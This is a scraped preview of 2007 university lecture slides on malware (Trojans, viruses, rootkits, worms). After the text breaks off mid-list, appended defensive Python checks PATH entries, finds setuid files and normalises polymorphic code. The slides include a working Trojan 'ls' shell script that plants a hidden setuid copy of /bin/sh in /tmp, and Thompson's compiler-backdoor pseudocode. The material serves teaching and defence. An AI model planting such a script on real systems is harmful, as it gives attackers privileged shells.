U of I CS 498 - Malware and Exploit Enabling Code

This preview shows page 1-2-3-21-22-23-43-44-45 out of 45 pages.

Save
View full document
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
View full document
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience
Premium Document
Do you want full access? Go Premium and unlock all 45 pages.
Access to all documents
Download any document
Ad free experience

Unformatted text preview:

Malware and Exploit Enabling Code
CS 498 IA, Spring 2007

Reading Material
• In Computer Security: Art and Science
− Chapter 22
• Sony DRM article
− http://blogs.technet.com/markrussinovich/archive/2005/10/31/sony-rootkits-and-digital-rights-management-gone-too-far.aspx#comments
• Worm Anatomy and Model
− http://portal.acm.org/citation.cfm?id=948196
• Smashing the Stack for Fun and Profit
− http://phrack.org/phrack/49/P49-14

Overview
• Malware
− Trojans
− Viruses
− Worms
• Software vulnerabilities
− Buffer overruns
− Others

Software and Security
“The Navy's Smart Ship technology is being considered a success, because it has resulted in reduced manpower, workloads, maintenance and costs for sailors aboard the Aegis missile cruiser USS Yorktown. However, in September 1997, the Yorktown suffered a systems failure during maneuvers off the coast of Cape Charles, VA., apparently as a result of the failure to prevent a divide by zero in a Windows NT application. The zero seems to have been an erroneous data item that was manually entered. Atlantic Fleet officials said the ship was dead in the water for about 2 hours and 45 minutes. A previous loss of propulsion occurred on 2 May 1997, also due to software. Other system collapses are also indicated.” - RISKS 19.88

Malicious Code
• Code that intentionally violates security policy
• Two questions:
− How does the code get executed?
− What does it do?

Trojan Horse
• Code is obtained from an untrusted party
• Code has two functions:
− overt: what you expect it to do
− covert: malicious action

Trojan Horse Example
./ls:
#!/bin/sh
cp /bin/sh /tmp/.xxsh      # covert: copy a shell where the attacker can find it
chmod u+s /tmp/.xxsh       # covert: make it setuid to whoever ran ./ls (the privileged victim)
rm ./ls                    # covert: remove the evidence
ls                         # overt: run the real ls so nothing looks wrong

WordPress
“It was determined that a cracker had gained user-level access to one of the servers that powers wordpress.org, and had used that access to modify the download file. We have locked down that server for further forensics, but at this time it appears that the 2.1.1 download was the only thing touched by the attack. They modified two files in WP to include code that would allow for remote PHP execution.”

Trojan Horse Example
• Thompson Turing award lecture
compile(source) {
  if (match(source, "check_password")) { insert(source, A); }  /* A: backdoor in the login password check */
  if (match(source, "compile")) { insert(source, B); }         /* B: this insertion logic itself, so a rebuilt compiler stays trojaned */
  ...
}

Trojan Horses & TCB
• Thompson's example shows the importance of knowing where all parts of the TCB came from
− Includes hardware, O/S, login program, compiler?
• Reputable sources help, but are not a panacea against Trojan horses
− E.g. WordPress example, others
− Commercial software not immune

Viruses
• Thompson's Trojan propagated itself to other instances of the compiler
• Generally, a propagating Trojan horse is called a virus
− Malicious code that makes copies of itself
• Virus goals:
− Propagation
− Stealth
− Payload

Virus Propagation
• Viruses move via:
− Boot sectors
− Executables
− Macros
− Attachments
• Required qualities:
− Can house malicious code
− Traded frequently

Boot Sector Viruses
• First sector of disk executed at boot
• Worked well back when people traded floppies
− Could come back; “autorun.inf” on CDs
(Slide diagram: Boot | Data before infection; Virus | Data | Boot after infection, with the virus in the boot sector and the original boot code moved elsewhere on the disk)

Executables
• Attach itself to executable
− Virus executes before normal executable is run
• Can be multi-platform
• Popular method, esp. when BBS's were used to trade software
− Has also infected commercial software distributions
• Still in use today
(Slide diagram: Executable before infection; Executable + Virus after, with the virus attached so that it runs first)

Macros
• Data files traditionally safe from viruses
• Macro functionality blurs the line between data and code
− E.g. spreadsheet macro can:
• Modify spreadsheet
• Modify other spreadsheets
• Send email
• ...
• Melissa virus

Email attachments
• Email software started allowing attached files, including:
− Executables (dancing bears)
− Executables masquerading as data
− E.g. “LOVE-LETTER-FOR-YOU.txt.vbs”
• Spread by emailing itself to others
− Use address book to look more trustworthy
• Now moving onto mobile phones
− MMS viruses

Virus Protections
• Virus scanners look for viruses
− Signatures of known viruses
− Modified executables
− Strange memory-resident software

Virus Stealth Techniques
• Dormant period
• Event-triggered payload
• Encryption
• Polymorphism
• Root kits (later)

Encryption
• Encrypt virus content
• Use small decryption routine with changing key to decrypt prior to execution
• Anti-virus: find decryption routine?
(Slide diagram: Virus in the clear; then encrypted Virus body plus a small Decryptor)

Polymorphism
• Equivalent code
− Insert NO-OP instructions, useless operations
• x = x+1 ; x = x-1
− Reorder registers, instructions, control flow
− ...
• Detection problem: check whether code is equivalent to virus
− How difficult is this?

Rootkits
• Insert file filters to cause files or directories to disappear from normal listings
− Can replace Windows API pointers (user mode)
− Can also replace syscall table pointers
• Both require privilege, but with Windows most installs require privilege anyway
− The power of extensibility used for the dark side
• Techniques apply equally well to Linux and Mac

Sony Player DRM and Rootkits
• Bad press for Sony last year
− Mark Russinovich's original observations
http://blogs.technet.com/markrussinovich/archive/2005/10/31/sony-rootkits-and-digital-rights-management-gone-too-far.aspx#comments
− A timeline
http://www.boingboing.net/2005/11/14/sony_anticustomer_te.html
• To ensure that copy protection is not evaded, install a rootkit to hide the protection code
− Available for other attackers to use
− Non-uninstallable
− Uses CPU and memory
− Not adequately noted in EULA

Viruses and Security Policies
• How do security policies interact with viruses?
− BLP?
− Biba?
− DAC?

Worms
• Worms: viruses that spread automatically through a network
− Usu. without human interaction
− Usu. by exploiting a vulnerability
• Terminology sometimes fuzzy

The Morris Worm Incident
• How 99 lines of code brought down the Internet (ARPANET actually) in November 1988.
• Robert Morris Jr., Ph.D. student, Cornell, wrote a program that could:
− Connect to another computer, and find and use one of several vulnerabilities (buffer overflow in fingerd, password cracking etc.) to copy itself to that second computer.
− Begin to run the copy of itself at the new location.
− Both the original code and the copy would then repeat these actions in an infinite loop to other computers on the ARPANET (mistake!)

Worms vs. Computer Security
• Worms change the computer security field
− 60's, 70's: focus on secure design, security policies, complete mediation, ...
− 80's: focus on cryptography, network
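The ./ls Trojan horse above only works if a lookup of "ls" can land on the planted file, and it only pays off if a privileged user runs it and leaves the setuid shell behind in /tmp. The checks below for both preconditions are an added example, not part of the lecture; the function names are my own.

```python
"""Hygiene checks for the two preconditions of the ./ls Trojan horse above
(added example, not from the lecture): "ls" must resolve to a file in a
directory the attacker could write to, and a privileged victim must have
run it and left the setuid shell behind in /tmp."""
import os
import stat

def unsafe_path_entries(path_value):
    """Return (entry, reason) pairs for PATH entries that let a planted
    binary shadow a real command: "." or an empty entry (current directory),
    a relative entry, or an existing world-writable directory without the
    sticky bit.  Only absolute entries that exist here are stat'ed."""
    flagged = []
    for entry in path_value.split(os.pathsep):
        if entry in ("", "."):
            flagged.append((entry or "(empty)", "current directory is searched"))
        elif not os.path.isabs(entry):
            flagged.append((entry, "relative entry, resolves against the cwd"))
        elif os.path.isdir(entry):
            mode = os.stat(entry).st_mode
            if mode & stat.S_IWOTH and not mode & stat.S_ISVTX:
                flagged.append((entry, "world-writable without the sticky bit"))
    return flagged

def is_setuid_mode(mode):
    """True if `mode` (from os.stat) is a regular file with setuid or setgid set."""
    return bool(stat.S_ISREG(mode) and mode & (stat.S_ISUID | stat.S_ISGID))

def setuid_files(directory):
    """Walk `directory` and list setuid/setgid regular files: a hidden setuid
    copy of /bin/sh is exactly what ./ls drops in /tmp."""
    found = []
    for root, _dirs, files in os.walk(directory):
        for name in files:
            path = os.path.join(root, name)
            try:
                st = os.lstat(path)   # lstat: never follow a planted symlink
            except OSError:
                continue
            if is_setuid_mode(st.st_mode):
                found.append(path)
    return found

if __name__ == "__main__":
    for entry, reason in unsafe_path_entries(os.environ.get("PATH", "")):
        print("PATH entry %r: %s" % (entry, reason))
    for path in setuid_files("/tmp"):
        print("setuid file:", path)
```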
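The Virus Protections and Polymorphism slides above ask how a signature scanner copes with code that is equivalent but rewritten. As an added example (not from the lecture), a toy instruction stream stands in for machine code; VIRUS_SIGNATURE, the instruction syntax and the rewrite rules are constructed for illustration.

```python
"""Signature scanning against a polymorphic variant (added example, not
from the lecture).  A toy instruction stream stands in for machine code:
the "virus" is a fixed instruction sequence, polymorph() rewrites it with
the tricks on the Polymorphism slide (NO-OPs, a cancelling x+1/x-1 pair,
register renaming), and normalize() undoes exactly those rewrites."""
import re

# Constructed sample virus body; a real scanner would hold byte patterns.
VIRUS_SIGNATURE = ("mov r1, 0x40", "load r2, [r1]", "xor r2, 0x5a",
                   "store [r1], r2", "jmp r1")
INVERSES = {"add": "sub", "sub": "add"}   # operations that cancel in pairs

def scan(stream, signature=VIRUS_SIGNATURE):
    """Plain signature scan: is signature a contiguous run inside stream?"""
    sig, n = tuple(signature), len(signature)
    return any(tuple(stream[i:i + n]) == sig for i in range(len(stream) - n + 1))

def polymorph(body, rename):
    """Toy polymorphic engine: rename registers per `rename`, then pad each
    instruction with a NO-OP and a useless add/sub pair on a spare register."""
    out = []
    for ins in body:
        ins = re.sub(r"\br\d\b", lambda m: rename.get(m.group(0), m.group(0)), ins)
        out += [ins, "nop", "add r7, 1", "sub r7, 1"]
    return out

def normalize(stream):
    """Canonical form: drop NO-OPs, cancel adjacent inverse operations on the
    same operands, and rename registers in order of first use.  Only these
    three rewrites are undone; equivalence of arbitrary code is undecidable."""
    out = []
    for ins in stream:
        if ins == "nop":
            continue
        if out:
            prev_op, _, prev_args = out[-1].partition(" ")
            op, _, args = ins.partition(" ")
            if INVERSES.get(prev_op) == op and prev_args == args:
                out.pop()          # "add r7, 1" then "sub r7, 1" cancels out
                continue
        out.append(ins)
    names = {}
    canon = lambda m: names.setdefault(m.group(0), "r%d" % (len(names) + 1))
    return [re.sub(r"\br\d\b", canon, ins) for ins in out]

if __name__ == "__main__":
    variant = polymorph(list(VIRUS_SIGNATURE), {"r1": "r5", "r2": "r3"})
    print("plain scan on variant:", scan(variant))            # False
    print("scan after normalize:", scan(normalize(variant)))  # True
```

Register renaming here is relative to the whole stream, so a benign prefix that uses registers shifts the canonical names; a production scanner would canonicalize each candidate window separately. Undoing the three listed rewrites is all this can do, which is the slide's point: deciding equivalence of arbitrary code is undecidable.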